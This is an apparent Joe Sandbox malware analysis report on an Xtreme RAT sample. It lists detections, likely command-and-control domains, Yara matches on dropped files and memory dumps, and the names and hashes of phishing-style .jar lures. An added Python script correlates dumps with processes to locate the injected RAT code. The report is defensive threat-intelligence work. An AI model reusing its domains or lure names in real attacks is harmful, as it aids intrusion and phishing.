35.0.358saxio.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.0.358saxio.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.sxz.exe.400000.0.unpack | 100% | Avira | DR/Injector.toian
1.1.sxz.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.0.358saxio.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.1.358saxio.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

Source | Detection | Scanner | Label
iaficasioo.zapto.org | 1% | virustotal |
fashionstune.com | 3% | virustotal |

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

Source | Rule | Description | Author
C:\Windows\InstallDir\Server.exe | Xtreme_Sep17_1 | Detects XTREME sample analyzed in September 2017 | Florian Roth
C:\Windows\InstallDir\Server.exe | RAT_Xtreme | Detects Xtreme RAT | Kevin Breen <kevin@techanarchy.net>
C:\Users\user~1\AppData\Local\Temp\server.exe | Xtreme_Sep17_1 | Detects XTREME sample analyzed in September 2017 | Florian Roth
C:\Users\user~1\AppData\Local\Temp\server.exe | RAT_Xtreme | Detects Xtreme RAT | Kevin Breen <kevin@techanarchy.net>

Memory Dumps

Rules matched (Rule | Description | Author):
Xtreme_Sep17_1 | Detects XTREME sample analyzed in September 2017 | Florian Roth
RAT_Xtreme | Detects Xtreme RAT | Kevin Breen <kevin@techanarchy.net>

Source | Rule(s)
00000003.00000000.14905165956.00C81000.00000020.sdmp | RAT_Xtreme
0000000F.00000000.14937698570.00C81000.00000020.sdmp | RAT_Xtreme
0000000F.00000002.14989895202.00C81000.00000020.sdmp | RAT_Xtreme
0000001B.00000000.15000788791.00C81000.00000020.sdmp | RAT_Xtreme
0000000F.00000000.14932929795.00C81000.00000020.sdmp | RAT_Xtreme
00000022.00000000.15012281235.00C80000.00000040.sdmp | Xtreme_Sep17_1, RAT_Xtreme
00000003.00000001.14905808954.00C81000.00000020.sdmp | RAT_Xtreme
0000000E.00000001.14937243423.01B81000.00000020.sdmp | RAT_Xtreme
00000003.00000002.14987723130.00C81000.00000020.sdmp | RAT_Xtreme
0000001B.00000001.15007151931.00C81000.00000020.sdmp | RAT_Xtreme
0000001B.00000000.15001441864.00C81000.00000020.sdmp | RAT_Xtreme
00000005.00000002.15179880413.00C80000.00000040.sdmp | Xtreme_Sep17_1, RAT_Xtreme
0000001B.00000000.14999659592.00C81000.00000020.sdmp | RAT_Xtreme
00000006.00000002.14955870384.00C80000.00000040.sdmp | Xtreme_Sep17_1, RAT_Xtreme
0000000F.00000000.14944848932.00C81000.00000020.sdmp | RAT_Xtreme
00000005.00000002.15177862719.00290000.00000004.sdmp | Xtreme_Sep17_1, RAT_Xtreme
0000000F.00000000.14950318636.00C81000.00000020.sdmp | RAT_Xtreme
0000000F.00000001.14957378618.00C81000.00000020.sdmp | RAT_Xtreme
00000006.00000000.14913253676.00C80000.00000040.sdmp | Xtreme_Sep17_1, RAT_Xtreme
00000003.00000000.14904035142.00C81000.00000020.sdmp | RAT_Xtreme
0000000E.00000001.14936774837.01B81000.00000020.sdmp | RAT_Xtreme
0000001B.00000002.15035469105.00C81000.00000020.sdmp | RAT_Xtreme
00000003.00000000.14905430148.00C81000.00000020.sdmp | RAT_Xtreme
00000003.00000000.14904944731.00C81000.00000020.sdmp | RAT_Xtreme
00000005.00000000.14909911900.00C80000.00000040.sdmp | Xtreme_Sep17_1, RAT_Xtreme
0000001B.00000000.15004091676.00C81000.00000020.sdmp | RAT_Xtreme
00000022.00000002.15021754459.00C80000.00000040.sdmp | Xtreme_Sep17_1, RAT_Xtreme

Unpacked PEs

Rules matched (Rule | Description | Author):
Xtreme_Sep17_1 | Detects XTREME sample analyzed in September 2017 | Florian Roth
RAT_Xtreme | Detects Xtreme RAT | Kevin Breen <kevin@techanarchy.net>

Every unpacked PE below matches both rules:
34.0.iexplore.exe.c80000.0.raw.unpack
27.1.Server.exe.c80000.0.unpack
3.2.server.exe.c80000.1.unpack
15.0.Server.exe.c80000.0.unpack
5.2.svchost.exe.c80000.6.unpack
15.0.Server.exe.c80000.1.unpack
3.0.server.exe.c80000.2.unpack
6.0.iexplore.exe.c80000.0.unpack
27.2.Server.exe.c80000.1.unpack
6.2.iexplore.exe.c80000.2.unpack
5.2.svchost.exe.c80000.6.raw.unpack
14.1.explorer.exe.1b80000.0.unpack
3.0.server.exe.c80000.0.unpack
15.1.Server.exe.c80000.0.unpack
34.2.iexplore.exe.c80000.2.raw.unpack
14.1.explorer.exe.1b80000.1.unpack
5.0.svchost.exe.c80000.0.unpack
27.0.Server.exe.c80000.1.unpack
27.0.Server.exe.c80000.0.unpack
15.0.Server.exe.c80000.2.unpack
6.2.iexplore.exe.c80000.2.raw.unpack
15.2.Server.exe.c80000.1.unpack
34.0.iexplore.exe.c80000.0.unpack
15.0.Server.exe.c80000.3.unpack
5.0.svchost.exe.c80000.0.raw.unpack
27.0.Server.exe.c80000.3.unpack
3.0.server.exe.c80000.3.unpack
34.2.iexplore.exe.c80000.2.unpack
3.0.server.exe.c80000.1.unpack
5.2.svchost.exe.290000.1.unpack
27.0.Server.exe.c80000.2.unpack
3.1.server.exe.c80000.0.unpack
5.2.svchost.exe.290000.1.raw.unpack
6.0.iexplore.exe.c80000.0.raw.unpack
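Added example (not Joe Sandbox code) that ties the Memory Dumps rows to the Unpacked PEs rows above, so the Yara hits can be read per process rather than per dump. A dump identifier such as 0000000F.00000002.14989895202.00C81000.00000020.sdmp is decoded as <process no>.<stage>.<timestamp>.<base address>.<page protection>, every field but the timestamp in hexadecimal; that decoding is inferred from the identifiers themselves and cross-checked against the unpacked PE names, which carry the same process number in decimal (0x0F is 15.0.Server.exe..., 0x22 is 34.0.iexplore.exe..., 0x0E is 14.1.explorer.exe... at base 1b80000). The protection values are the Win32 PAGE_* constants. The row subsets embedded in the code are constructed copies of the page's own rows.

```python
"""Correlate Yara hits on memory dumps (Memory Dumps table) with process names
(Unpacked PEs table) and report where in each process the Xtreme RAT code sat.

Added example, not Joe Sandbox code. The dump-id field layout
<process no>.<stage>.<timestamp>.<base>.<protection> (hex except the timestamp)
is an assumption inferred from the identifiers in this report and checked
against the unpacked PE names, which carry the process number in decimal.
"""
import re
from collections import defaultdict

# Win32 memory protection constants (documented values).
PAGE_PROTECTION = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}

# Constructed subset of the report's Memory Dumps rows: (dump id, matching rule).
MEMORY_HITS = [
    ("00000003.00000000.14905165956.00C81000.00000020.sdmp", "RAT_Xtreme"),
    ("0000000F.00000002.14989895202.00C81000.00000020.sdmp", "RAT_Xtreme"),
    ("0000001B.00000001.15007151931.00C81000.00000020.sdmp", "RAT_Xtreme"),
    ("00000022.00000000.15012281235.00C80000.00000040.sdmp", "Xtreme_Sep17_1"),
    ("00000022.00000000.15012281235.00C80000.00000040.sdmp", "RAT_Xtreme"),
    ("0000000E.00000001.14937243423.01B81000.00000020.sdmp", "RAT_Xtreme"),
    ("00000005.00000002.15177862719.00290000.00000004.sdmp", "Xtreme_Sep17_1"),
    ("00000005.00000002.15177862719.00290000.00000004.sdmp", "RAT_Xtreme"),
    ("00000006.00000002.14955870384.00C80000.00000040.sdmp", "Xtreme_Sep17_1"),
    ("00000006.00000002.14955870384.00C80000.00000040.sdmp", "RAT_Xtreme"),
]

# Constructed subset of the report's Unpacked PEs names (process number is decimal here).
UNPACKED = [
    "2.1.sxz.exe.400000.0.unpack",
    "3.2.server.exe.c80000.1.unpack",
    "5.2.svchost.exe.c80000.6.unpack",
    "5.2.svchost.exe.290000.1.raw.unpack",
    "6.2.iexplore.exe.c80000.2.unpack",
    "14.1.explorer.exe.1b80000.0.unpack",
    "15.0.Server.exe.c80000.0.unpack",
    "27.1.Server.exe.c80000.0.unpack",
    "34.0.iexplore.exe.c80000.0.raw.unpack",
]

_DUMP = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9A-F]{8})\.(?P<prot>[0-9A-F]{8})\.sdmp$", re.I)
_UNPACK = re.compile(
    r"^(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<name>.+?)\.(?P<base>[0-9a-f]+)\.\d+(?:\.raw)?\.unpack$")


def parse_dump_id(dump_id):
    """Decode a .sdmp identifier into process number, stage, base address and protection."""
    m = _DUMP.match(dump_id)
    if not m:
        raise ValueError(f"not a dump id: {dump_id}")
    prot = int(m["prot"], 16)
    return {"proc": int(m["proc"], 16), "stage": int(m["stage"], 16),
            "base": int(m["base"], 16), "protection": PAGE_PROTECTION.get(prot, hex(prot))}


def process_names(unpacked):
    """Map process number -> image name using the unpacked PE names."""
    names = {}
    for entry in unpacked:
        m = _UNPACK.match(entry)
        if m:
            names[int(m["proc"])] = m["name"]
    return names


def correlate(memory_hits, unpacked):
    """Group Yara hits by (process number, image name), collecting rules and hit regions."""
    names = process_names(unpacked)
    grouped = defaultdict(lambda: {"rules": set(), "regions": set()})
    for dump_id, rule in memory_hits:
        d = parse_dump_id(dump_id)
        key = (d["proc"], names.get(d["proc"], "<unknown>"))
        grouped[key]["rules"].add(rule)
        grouped[key]["regions"].add((d["base"], d["protection"]))
    return dict(grouped)


def writable_hit_regions(correlated):
    """Regions that matched while writable: code there was written at runtime
    (injected or unpacked) rather than mapped from the process's own image."""
    writable = {"PAGE_READWRITE", "PAGE_EXECUTE_READWRITE"}
    return {proc: sorted(r for r in info["regions"] if r[1] in writable)
            for proc, info in correlated.items()
            if any(r[1] in writable for r in info["regions"])}


if __name__ == "__main__":
    result = correlate(MEMORY_HITS, UNPACKED)
    for (num, name), info in sorted(result.items()):
        regions = ", ".join(f"0x{b:X} ({p})" for b, p in sorted(info["regions"]))
        print(f"process {num:2d} {name:<13} rules={sorted(info['rules'])} regions={regions}")
    print("writable regions carrying RAT code:", writable_hit_regions(result))
```

Run over the full tables, the output shows the pattern the graph above only hints at: the RAT body sits at the same base (0xC80000/0xC81000) in server.exe, both Server.exe instances, svchost.exe and both iexplore.exe instances, and at 0x1B80000 in explorer.exe, while the writable hits (svchost.exe at 0x290000 and the RWX regions in iexplore.exe and svchost.exe) are the places where the payload was written into a foreign process.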

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

# | Associated Sample Name / URL | SHA 256 | Detection

Match: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll
25 | New Order.jar | 6dd7e4306bf105e9208151b587a99f0e917605d29a752af8adac7b97f041493c | malicious
49 | scan_201717067354367.jar | 0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd | malicious
73 | Doc Bidding Tender PO-211411.jar | 5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50c | malicious
74 | Profoma Invoice pdf copy.jar | c512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510 | malicious
1 | TT_COPY_A2017030255.jpg.jar | 0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd | malicious
97 | Payment-pdf.jar | ff860260e27631332f95ff653243f05d791208540afeb3e7a46bcb31b6462fcf | malicious
95 | April PO.jar | 1b1dcfc915840c54c876591314c50a47bd4b012c1c8a75c49a892f4a9ca813dc | malicious
69 | AWBRef38304003993.pdf.jar | 83d655b68632215cd32af6bd6a6b44aec16709daa9e2009b99a60cdb45c333e1 | malicious
98 | SWIFT.jar | 92797129f3e958c2fbe33387e751185d2ce58aa5ff0baf59a420717b68070d5f | malicious
93 | NEW_INVOICE_ORDER_0948776633.jar | 14bb1fdc161af6b58b6bef32f91f065bbffcde6b01c6a5a0dc1b4f6eb433fec8 | malicious
45 | Inquiry No. (12157) PI from threeway 1214.jar | a6995b8c377aa017dc8b2775dd50bb986f4b473bd88238ba27f5130c7244bd9f | malicious
46 | Order Specification.jar | c3f6672c76f4c0bf73b12f83b268aa6c371eb3c25673c203a4d1382a6a7cf31f | malicious
77 | B&L Order No 171022 - Master Mar - MV Northern Juvenile.jar | eaf5d83198b376be7d3b86675a217c497eb57fda69063f2a5dde58dd3bd0ba37 | malicious
89 | CV.jar | 8acccee38b0c5f38906561ebffea1d3320bfcd1543bea943fa99794d1cd7cc4f | malicious
83 | PO-04217.jar | 31c6b4f805747bc91473171f4751ebac8a00bb120901ddbce948f07132b5ef39 | malicious
179 | P-39 Oxfam Australia.jar | c7b3b91667badeac5e88133fd1bb9a8b19b116c0ca79a9ed890b30b7b07d8f23 | malicious
11 | previous Quotation.jar | 8113272d91207f80d3f3f5174cd3e7c6e3ccdc6a8fef6d44cd48442d201873ee | malicious
83 | April Order.jar | cf2af87daa6da31aa30467a8be83273d9e325f6142581142273c378b97d40e17 | malicious
27 | TT_COPY_A2017030255.jpg.jar | 31d398be8f94446f579bde3cb6873279f22ffba20435b7799cd86d7a5db7e05a | malicious
55 | documents.pdf.jar | b7fb2a1ae8dd7e3dc5594cb02c246e0a6bbae9ec8b3ca0d1355b51f7ea6d0bdf | malicious

Match: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll
25 | New Order.jar | 6dd7e4306bf105e9208151b587a99f0e917605d29a752af8adac7b97f041493c | malicious
49 | scan_201717067354367.jar | 0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd | malicious
73 | Doc Bidding Tender PO-211411.jar | 5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50c | malicious
74 | Profoma Invoice pdf copy.jar | c512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510 | malicious
1 | TT_COPY_A2017030255.jpg.jar | 0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd | malicious
97 | Payment-pdf.jar | ff860260e27631332f95ff653243f05d791208540afeb3e7a46bcb31b6462fcf | malicious
95 | April PO.jar | 1b1dcfc915840c54c876591314c50a47bd4b012c1c8a75c49a892f4a9ca813dc | malicious
69 | AWBRef38304003993.pdf.jar | 83d655b68632215cd32af6bd6a6b44aec16709daa9e2009b99a60cdb45c333e1 | malicious
98 | SWIFT.jar | 92797129f3e958c2fbe33387e751185d2ce58aa5ff0baf59a420717b68070d5f | malicious
93 | NEW_INVOICE_ORDER_0948776633.jar | 14bb1fdc161af6b58b6bef32f91f065bbffcde6b01c6a5a0dc1b4f6eb433fec8 | malicious
45 | Inquiry No. (12157) PI from threeway 1214.jar | a6995b8c377aa017dc8b2775dd50bb986f4b473bd88238ba27f5130c7244bd9f | malicious
46 | Order Specification.jar | c3f6672c76f4c0bf73b12f83b268aa6c371eb3c25673c203a4d1382a6a7cf31f | malicious
77 | B&L Order No 171022 - Master Mar - MV Northern Juvenile.jar | eaf5d83198b376be7d3b86675a217c497eb57fda69063f2a5dde58dd3bd0ba37 | malicious
89 | CV.jar | 8acccee38b0c5f38906561ebffea1d3320bfcd1543bea943fa99794d1cd7cc4f | malicious
83 | PO-04217.jar | 31c6b4f805747bc91473171f4751ebac8a00bb120901ddbce948f07132b5ef39 | malicious
179 | P-39 Oxfam Australia.jar | c7b3b91667badeac5e88133fd1bb9a8b19b116c0ca79a9ed890b30b7b07d8f23 | malicious
11 | previous Quotation.jar | 8113272d91207f80d3f3f5174cd3e7c6e3ccdc6a8fef6d44cd48442d201873ee | malicious
83 | April Order.jar | cf2af87daa6da31aa30467a8be83273d9e325f6142581142273c378b97d40e17 | malicious
27 | TT_COPY_A2017030255.jpg.jar | 31d398be8f94446f579bde3cb6873279f22ffba20435b7799cd86d7a5db7e05a | malicious
55 | documents.pdf.jar | b7fb2a1ae8dd7e3dc5594cb02c246e0a6bbae9ec8b3ca0d1355b51f7ea6d0bdf | malicious

Match: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll
25 | New Order.jar | 6dd7e4306bf105e9208151b587a99f0e917605d29a752af8adac7b97f041493c | malicious
49 | scan_201717067354367.jar | 0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd | malicious
73 | Doc Bidding Tender PO-211411.jar | 5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50c | malicious
74 | Profoma Invoice pdf copy.jar | c512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510 | malicious
1 | TT_COPY_A2017030255.jpg.jar | 0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd | malicious
97 | Payment-pdf.jar | ff860260e27631332f95ff653243f05d791208540afeb3e7a46bcb31b6462fcf | malicious
95 | April PO.jar | 1b1dcfc915840c54c876591314c50a47bd4b012c1c8a75c49a892f4a9ca813dc | malicious
69 | AWBRef38304003993.pdf.jar | 83d655b68632215cd32af6bd6a6b44aec16709daa9e2009b99a60cdb45c333e1 | malicious
98 | SWIFT.jar | 92797129f3e958c2fbe33387e751185d2ce58aa5ff0baf59a420717b68070d5f | malicious
93 | NEW_INVOICE_ORDER_0948776633.jar | 14bb1fdc161af6b58b6bef32f91f065bbffcde6b01c6a5a0dc1b4f6eb433fec8 | malicious
45 | Inquiry No. (12157) PI from threeway 1214.jar | a6995b8c377aa017dc8b2775dd50bb986f4b473bd88238ba27f5130c7244bd9f | malicious
46 | Order Specification.jar | c3f6672c76f4c0bf73b12f83b268aa6c371eb3c25673c203a4d1382a6a7cf31f | malicious
77 | B&L Order No 171022 - Master Mar - MV Northern Juvenile.jar | eaf5d83198b376be7d3b86675a217c497eb57fda69063f2a5dde58dd3bd0ba37 | malicious
89 | CV.jar | 8acccee38b0c5f38906561ebffea1d3320bfcd1543bea943fa99794d1cd7cc4f | malicious
83 | PO-04217.jar | 31c6b4f805747bc91473171f4751ebac8a00bb120901ddbce948f07132b5ef39 | malicious
179 | P-39 Oxfam Australia.jar | c7b3b91667badeac5e88133fd1bb9a8b19b116c0ca79a9ed890b30b7b07d8f23 | malicious
11 | previous Quotation.jar | 8113272d91207f80d3f3f5174cd3e7c6e3ccdc6a8fef6d44cd48442d201873ee | malicious
83 | April Order.jar | cf2af87daa6da31aa30467a8be83273d9e325f6142581142273c378b97d40e17 | malicious
27 | TT_COPY_A2017030255.jpg.jar | 31d398be8f94446f579bde3cb6873279f22ffba20435b7799cd86d7a5db7e05a | malicious
55 | documents.pdf.jar | b7fb2a1ae8dd7e3dc5594cb02c246e0a6bbae9ec8b3ca0d1355b51f7ea6d0bdf | malicious

Screenshots